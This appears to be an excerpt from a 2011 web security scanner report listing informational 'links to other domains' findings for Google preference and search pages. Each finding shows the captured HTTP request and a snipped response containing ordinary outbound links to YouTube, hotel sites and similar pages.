<li><a href="http://www.google.ba"><span class="ba">
...[SNIP]...
<li><a href="http://www.google.be"><span class="be">
...[SNIP]...
<li><a href="http://www.google.bf"><span class="bf">
...[SNIP]...
<li><a href="http://www.google.bg"><span class="bg">
...[SNIP]...
<li><a href="http://www.google.bi"><span class="bi">
...[SNIP]...
<li><a href="http://www.google.bj"><span class="bj">
...[SNIP]...
<li><a href="http://www.google.bs"><span class="bs">
...[SNIP]...
<li><a href="http://www.google.by"><span class="by">
...[SNIP]...
<li><a href="http://www.google.ca"><span class="ca">
...[SNIP]...
<li><a href="http://www.google.cd"><span class="cd">
...[SNIP]...
<li><a href="http://www.google.cf"><span class="cf">
...[SNIP]...
<li><a href="http://www.google.cg"><span class="cg">
...[SNIP]...
<li><a href="http://www.google.ch"><span class="ch">
...[SNIP]...
<li><a href="http://www.google.ci"><span class="ci">
...[SNIP]...
<li><a href="http://www.google.cl"><span class="cl">
...[SNIP]...
<li><a href="http://www.google.cm"><span class="cm">
...[SNIP]...
<li><a href="http://www.google.cn"><span class="cn">
...[SNIP]...
<li><a href="http://www.google.cz"><span class="cz">
...[SNIP]...
<li><a href="http://www.google.de"><span class="de">
...[SNIP]...
<li><a href="http://www.google.dj"><span class="dj">
...[SNIP]...
<li><a href="http://www.google.dk"><span class="dk">
...[SNIP]...
<li><a href="http://www.google.dm"><span class="dm">
...[SNIP]...
<li><a href="http://www.google.dz"><span class="dz">
...[SNIP]...
<li><a href="http://www.google.ee"><span class="ee">
...[SNIP]...
<li><a href="http://www.google.es"><span class="es">
...[SNIP]...
<li><a href="http://www.google.fi"><span class="fi">
...[SNIP]...
<li><a href="http://www.google.fm"><span class="fm">
...[SNIP]...
<li><a href="http://www.google.fr"><span class="fr">
...[SNIP]...
<li><a href="http://www.google.ga"><span class="ga">
...[SNIP]...
<li><a href="http://www.google.ge"><span class="ge">
...[SNIP]...
<li><a href="http://www.google.gg"><span class="gg">
...[SNIP]...
<li><a href="http://www.google.gl"><span class="gl">
...[SNIP]...
<li><a href="http://www.google.gm"><span class="gm">
...[SNIP]...
<li><a href="http://www.google.gp"><span class="gp">
...[SNIP]...
<li><a href="http://www.google.gr"><span class="gr">
...[SNIP]...
<li><a href="http://www.google.gy"><span class="gy">
...[SNIP]...
<li><a href="http://www.google.hn"><span class="hn">
...[SNIP]...
<li><a href="http://www.google.hr"><span class="hr">
...[SNIP]...
<li><a href="http://www.google.ht"><span class="ht">
...[SNIP]...
<li><a href="http://www.google.hu"><span class="hu">
...[SNIP]...
<li><a href="http://www.google.ie"><span class="ie">
...[SNIP]...
<li><a href="http://www.google.im"><span class="im">
...[SNIP]...
<li><a href="http://www.google.is"><span class="is">
...[SNIP]...
<li><a href="http://www.google.it"><span class="it">
...[SNIP]...
<li><a href="http://www.google.je"><span class="je">
...[SNIP]...
<li><a href="http://www.google.jo"><span class="jo">
...[SNIP]...
<li><a href="http://www.google.ki"><span class="ki">
...[SNIP]...
<li><a href="http://www.google.kg"><span class="kg">
...[SNIP]...
<li><a href="http://www.google.kz"><span class="kz">
...[SNIP]...
<li><a href="http://www.google.la"><span class="la">
...[SNIP]...
<li><a href="http://www.google.li"><span class="li">
...[SNIP]...
<li><a href="http://www.google.lk"><span class="lk">
...[SNIP]...
<li><a href="http://www.google.lt"><span class="lt">
...[SNIP]...
<li><a href="http://www.google.lu"><span class="lu">
...[SNIP]...
<li><a href="http://www.google.lv"><span class="lv">
...[SNIP]...
<li><a href="http://www.google.md"><span class="md">
...[SNIP]...
<li><a href="http://www.google.me"><span class="me">
...[SNIP]...
<li><a href="http://www.google.mg"><span class="mg">
...[SNIP]...
<li><a href="http://www.google.mk"><span class="mk">
...[SNIP]...
<li><a href="http://www.google.ml"><span class="ml">
...[SNIP]...
<li><a href="http://www.google.mn"><span class="mn">
...[SNIP]...
<li><a href="http://www.google.ms"><span class="ms">
...[SNIP]...
<li><a href="http://www.google.mu"><span class="mu">
...[SNIP]...
<li><a href="http://www.google.mv"><span class="mv">
...[SNIP]...
<li><a href="http://www.google.mw"><span class="mw">
...[SNIP]...
<li><a href="http://www.google.ne"><span class="ne">
...[SNIP]...
<li><a href="http://www.google.nl"><span class="nl">
...[SNIP]...
<li><a href="http://www.google.no"><span class="no">
...[SNIP]...
<li><a href="http://www.google.nr"><span class="nr">
...[SNIP]...
<li><a href="http://www.google.nu"><span class="nu">
...[SNIP]...
<li><a href="http://www.google.pl"><span class="pl">
...[SNIP]...
<li><a href="http://www.google.pn"><span class="pn">
...[SNIP]...
<li><a href="http://www.google.ps"><span class="ps">
...[SNIP]...
<li><a href="http://www.google.pt"><span class="pt">
...[SNIP]...
<li><a href="http://www.google.ro"><span class="ro">
...[SNIP]...
<li><a href="http://www.google.ru"><span class="ru">
...[SNIP]...
<li><a href="http://www.google.rw"><span class="rw">
...[SNIP]...
<li><a href="http://www.google.sc"><span class="sc">
...[SNIP]...
<li><a href="http://www.google.se"><span class="se">
...[SNIP]...
<li><a href="http://www.google.sh"><span class="sh">
...[SNIP]...
<li><a href="http://www.google.si"><span class="si">
...[SNIP]...
<li><a href="http://www.google.sk"><span class="sk">
...[SNIP]...
<li><a href="http://www.google.sn"><span class="sn">
...[SNIP]...
<li><a href="http://www.google.sm"><span class="sm">
...[SNIP]...
<li><a href="http://www.google.st"><span class="st">
...[SNIP]...
<li><a href="http://www.google.td"><span class="td">
...[SNIP]...
<li><a href="http://www.google.tg"><span class="tg">
...[SNIP]...
<li><a href="http://www.google.tk"><span class="tk">
...[SNIP]...
<li><a href="http://www.google.tl"><span class="tl">
...[SNIP]...
<li><a href="http://www.google.tm"><span class="tm">
...[SNIP]...
<li><a href="http://www.google.to"><span class="to">
...[SNIP]...
<li><a href="http://www.google.tt"><span class="tt">
...[SNIP]...
<li><a href="http://www.google.vg"><span class="vg">
...[SNIP]...
<li><a href="http://www.google.vu"><span class="vu">
...[SNIP]...
<li><a href="http://www.google.ws"><span class="ws">
...[SNIP]...
<li><a href="http://www.google.rs"><span class="rs">
...[SNIP]...

17.265. http://www.google.com/preferences previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/preferences

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/preferences?hl=en

The response contains the following link to another domain:

http://www.youtube.com/?hl=en&tab=w1

Request

GET /preferences?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:51:51 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Preferences</title><style>body,td,div,.p,a{font-family:arial,sans-serif}.ts{border-collapse:collaps
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

17.266. http://www.google.com/quality_form previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/quality_form

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/quality_form?q=millenium+boston&hl=en&prmd=ivnscm

The response contains the following link to another domain:

http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&um=1&ie=UTF-8&sa=N&tab=w1

Request

GET /quality_form?q=millenium+boston&hl=en&prmd=ivnscm HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 02 Feb 2011 15:55:32 GMT
Server: gws
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston - Google Search</title><script>window.google={kEI:"dH5JTfzbJJyQeaf30fYB",kEXPI:"17259,1729
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&hl=en&prmd=ivnscm&um=1&ie=UTF-8&sa=N&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

17.267. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?q=millenium+boston&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&hl=en&tab=wv

The response contains the following links to other domains:

http://bigthink.com/ideas/2834
http://img.youtube.com/vi/9GbYywWgSIQ/default.jpg
http://img.youtube.com/vi/GNJ209hycpA/default.jpg
http://img.youtube.com/vi/_Ygc4S_Sy5c/default.jpg
http://img.youtube.com/vi/bn8BW9UlwbQ/default.jpg
http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg
http://img.youtube.com/vi/zNqc4wnj974/default.jpg
http://img.youtube.com/vi/zphTL6asEcc/default.jpg
http://tripwow.tripadvisor.com/tripwow/ta-009e-e8c0-2d9b
http://ulocal.thebostonchannel.com/_moving-vietnam-wall-millenium-park-west-roxbury/VIDEO/791506/61862.html
http://www.autoexposure.co.uk/vehicle.cfm?Id=AETV28708568&Image=Video
http://www.youtube.com/results?q=millenium+boston&um=1&hl=en&ie=UTF-8&sa=N&tab=v1
http://www.youtube.com/view_play_list?p=E602408537B69D96
http://www.youtube.com/watch?v=GNJ209hycpA
http://www.youtube.com/watch?v=_Ygc4S_Sy5c
http://www.youtube.com/watch?v=iHkBLYEKQ-w
http://www.youtube.com/watch?v=zNqc4wnj974
http://www.youtube.com/watch?v=zphTL6asEcc

Request

GET /search?q=millenium+boston&um=1&ie=UTF-8&tbo=u&tbs=vid:1&source=og&sa=N&hl=en&tab=wv HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:48:00 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>millenium boston - Google Search</title><script>window.google={kEI:"sHxJTfrmF4Wdlgf92pTZDw",kEXPI:"17259,17
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&hl=en&ie=UTF-8&sa=N&tab=v1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a id="v-3560004041311514169" href="/url?q=http://www.youtube.com/watch%3Fv%3DzphTL6asEcc&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CDQQuAIwAA&usg=AFQjCNHEVFCihKMcgpfbxjY7fGYm-BC99w" ><img src="http://img.youtube.com/vi/zphTL6asEcc/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb1 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=zphTL6asEcc" class=l onmousedown="return clk(this.href,'','14886740032398037447','','1','','0CDMQtwIwAA')"><em>
...[SNIP]...
<a id="v-8612851517419273236" href="/url?q=http://www.youtube.com/watch%3Fv%3DiHkBLYEKQ-w&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CDgQuAIwAQ&usg=AFQjCNFrOMIWpoJB8eOcaX1P0NMJrCAZvQ" ><img src="http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb2 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=iHkBLYEKQ-w" class=l onmousedown="return clk(this.href,'','9833892556290278380','','2','','0CDcQtwIwAQ')">04-Backstreet Boys Live in <em>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/view_play_list%3Fp%3DE602408537B69D96&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CDwQ7gcwAg&usg=AFQjCNHmchtYtspaVhxt7QVyUil1d5ZBlg"><img src="http://img.youtube.com/vi/9GbYywWgSIQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s2 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/view_play_list%3Fp%3DE602408537B69D96&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CDwQ7gcwAg&usg=AFQjCNHmchtYtspaVhxt7QVyUil1d5ZBlg"><img src="http://img.youtube.com/vi/iHkBLYEKQ-w/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s1 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<a href="/url?q=http://www.youtube.com/view_play_list%3Fp%3DE602408537B69D96&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CDwQ7gcwAg&usg=AFQjCNHmchtYtspaVhxt7QVyUil1d5ZBlg"><img src="http://img.youtube.com/vi/bn8BW9UlwbQ/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb3s0 style=";padding:1px 1px" width=120></a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/view_play_list?p=E602408537B69D96" class=l onmousedown="return clk(this.href,'','7962084160143999412','','3','','0CDsQywgwAg')">Backstreet Boys - <em>
...[SNIP]...
<a id="v1788622654261064336" href="/url?q=http://www.youtube.com/watch%3Fv%3DGNJ209hycpA&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CEQQuAIwAw&usg=AFQjCNGEn7Dufrmz69a7r33IR1663czfrQ" ><img src="http://img.youtube.com/vi/GNJ209hycpA/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb4 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=GNJ209hycpA" class=l onmousedown="return clk(this.href,'','1788622654261064336','','4','','0CEMQtwIwAw')">15-Backstreet Boys Live in <em>
...[SNIP]...
<a id="v-3685460846111885378" href="/url?q=http://www.youtube.com/watch%3Fv%3DzNqc4wnj974&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CEgQuAIwBA&usg=AFQjCNEbhCxkduqRo6F77oZmdEWc34Nzuw" ><img src="http://img.youtube.com/vi/zNqc4wnj974/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb5 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=zNqc4wnj974" class=l onmousedown="return clk(this.href,'','14761283227597666238','','5','','0CEcQtwIwBA')">11-Backstreet Boys Live in <em>
...[SNIP]...
<h3 class=r><a href="http://tripwow.tripadvisor.com/tripwow/ta-009e-e8c0-2d9b" class=l onmousedown="return clk(this.href,'','10539905228657202830','','6','','0CEsQtwIwBQ')">Blue Hills And <em>
...[SNIP]...
<h3 class=r><a href="http://bigthink.com/ideas/2834" class=l onmousedown="return clk(this.href,'','14370886124198173941','','7','','0CE8QtwIwBg')" title="What is the Show Me Poverty Action Tour? | John Legend | Big Think">What is the Show Me Poverty Action Tour? | John <b>
...[SNIP]...
<h3 class=r><a href="http://ulocal.thebostonchannel.com/_moving-vietnam-wall-millenium-park-west-roxbury/VIDEO/791506/61862.html" class=l onmousedown="return clk(this.href,'','6878633426385711071','','8','','0CFMQtwIwBw')">moving vietnam wall <em>
...[SNIP]...
<h3 class=r><a href="http://www.autoexposure.co.uk/vehicle.cfm?Id=AETV28708568&Image=Video" class=l onmousedown="return clk(this.href,'','597166181954965068','','9','','0CFcQtwIwCA')" title="Used LAND ROVER FREELANDER 1.8i Station Wagon Millenium for sale in Boston, Lincolnshire">Used LAND ROVER FREELANDER 1.8i Station <b>
...[SNIP]...
<a id="v-177860431785571433" href="/url?q=http://www.youtube.com/watch%3Fv%3D_Ygc4S_Sy5c&sa=X&ei=sHxJTfrmF4Wdlgf92pTZDw&ved=0CFwQuAIwCQ&usg=AFQjCNGqga71iRXhTs8_NG7rbYGcV3QJJQ" ><img src="http://img.youtube.com/vi/_Ygc4S_Sy5c/default.jpg" alt="" align=middle border=1 height=90 id=vidthumb10 style=";padding:1px 1px" width=120> </a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=_Ygc4S_Sy5c" class=l onmousedown="return clk(this.href,'','18268883641923980183','','10','','0CFsQtwIwCQ')">01-Backstreet Boys Live in <em>
...[SNIP]...

17.268. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=millenium+boston

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Millennium_Place
http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:LdrDMcGpc-0J:en.wikipedia.org/wiki/Millennium_Place+millenium+boston&cd=17&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MZCRUYsHAAMJ:www.mill-im.com/+millenium+boston&cd=18&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MZVl6Tm27rwJ:www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/+millenium+boston&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:MzOkyzIz36sJ:www.millenniumdaycare.com/+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NGLhWghEPy0J:www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/+millenium+boston&cd=19&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:bmUY5UzYdb4J:www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:lcu5kWLyNDEJ:www.milleniumdental.net/+millenium+boston&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.mill-im.com/
http://www.milleniumdental.net/
http://www.millenniumdaycare.com/
http://www.millenniumhotels.com/millenniumboston/attractions/
http://www.millenniumhotels.com/millenniumboston/facilities/
http://www.millenniumhotels.com/millenniumboston/gallery/index.html
http://www.millenniumhotels.com/millenniumboston/index.html
http://www.millenniumhotels.com/millenniumboston/restaurant/
http://www.millenniumhotels.com/millenniumboston/rooms/
http://www.millenniumhotels.com/millenniumboston/specials/index.html
http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html
http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html
http://www.orbitz.com/hotel/United_States--MA/Boston/Millennium_Bostonian_Hotel_Boston/
http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html
http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html
http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
http://www.youtube.com/watch?v=iHkBLYEKQ-w
http://www.youtube.com/watch?v=zphTL6asEcc

Request

GET /search?sourceid=chrome&ie=UTF-8&q=millenium+boston HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:47:59 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/GeNLY2f-.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 94122

<!doctype html><head><title>millenium boston - Google Search</title><script>window.google={kEI:"r3xJTbrUEsSblgehlNEu",kEXPI:"17259,17291,27615,27683,28068,28187,28387,28402",kCSI:{e:"17259,17291,27615
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=millenium+boston&um=1&ie=UTF-8&sa=N&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/index.html" class=l onmousedown="return clk(this.href,'','','','1','','0CDAQFjAA')">Downtown <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:4n55vHIzQXgJ:www.millenniumhotels.com/millenniumboston/index.html+millenium+boston&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CDUQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" onmousedown="return clk(this.href,'','','','1','','0CDYQqwMoADAA')">Specials & Packages</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/restaurant/" onmousedown="return clk(this.href,'','','','1','','0CDcQqwMoATAA')">Restaurants & Bars</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/rooms/" onmousedown="return clk(this.href,'','','','1','','0CDgQqwMoAjAA')">Guest Rooms</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/gallery/index.html" onmousedown="return clk(this.href,'','','','1','','0CDkQqwMoAzAA')">Take a Picture Gallery Tour</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/attractions/" onmousedown="return clk(this.href,'','','','1','','0CDoQqwMoBDAA')">Location & Attractions</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/facilities/" onmousedown="return clk(this.href,'','','','1','','0CDsQqwMoBTAA')">Facilities</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/specials/specials_0005.html" onmousedown="return clk(this.href,'','','','1','','0CDwQqwMoBjAA')">Bed & Breakfast Package</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.millenniumhotels.com/millenniumboston/whatshot/Holiday_Party_Events.html" onmousedown="return clk(this.href,'','','','1','','0CD0QqwMoBzAA')">Banquets & Meetings</a>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumhotels.com/millenniumboston/specials/index.html" class=l onmousedown="return clk(this.href,'','','','2','','0CEAQFjAB')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:BL2UXDHjun8J:www.millenniumhotels.com/millenniumboston/specials/index.html+millenium+boston&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CEUQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html" class=l onmousedown="return clk(this.href,'','','','3','','0CEcQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:Xle3EKG2cb4J:www.tripadvisor.com/Hotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html+millenium+boston&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CE0QIDAC')">Cached</a>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CE8QoAIwAw')" title="Millenium Day Care Center" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 0;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','4','','0CE8QoAIwAw')" title="Millenium Day Care Center"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CFYQoAIwBA')" title="Millenium Day Care Center" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 -38px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','5','','0CFYQoAIwBA')" title="Millenium Day Care Center"><em>
...[SNIP]...
<span valign=top align=left style="padding:10;margin:0;width:24px;height:38px"><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','8','','0CGsQoAIwBw')" title="Yazigi Ernerst" style="border:none;display:block;overflow:hidden;width:24px;height:38px"><span style="background: url('/images/red_icons_bg_A_J.png') no-repeat;background-position: 0 -152px;display:block;height:38px;width:24px">
...[SNIP]...
<h4 class=r><a href="http://www.milleniumdental.net/" class=l onmousedown="return clk(this.href,'','','','8','','0CGsQoAIwBw')" title="Yazigi Ernerst"><em>
...[SNIP]...
<h3 class="r"><a href="http://www.millenniumdaycare.com/" class=l onmousedown="return clk(this.href,'','','','11','','0CIQBEBYwCg')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:MzOkyzIz36sJ:www.millenniumdaycare.com/+millenium+boston&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','11','','0CIkBECAwCg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html" class=l onmousedown="return clk(this.href,'','','','12','','0CIsBEBYwCw')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:bmUY5UzYdb4J:www.virtualtourist.com/hotels/North_America/United_States_of_America/Massachusetts/Boston-794476/Hotels_and_Accommodations-Boston-Millennium_Bostonian_Hotel-BR-1.html+millenium+boston&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','12','','0CJQBECAwCw')">Cached</a>
...[SNIP]...
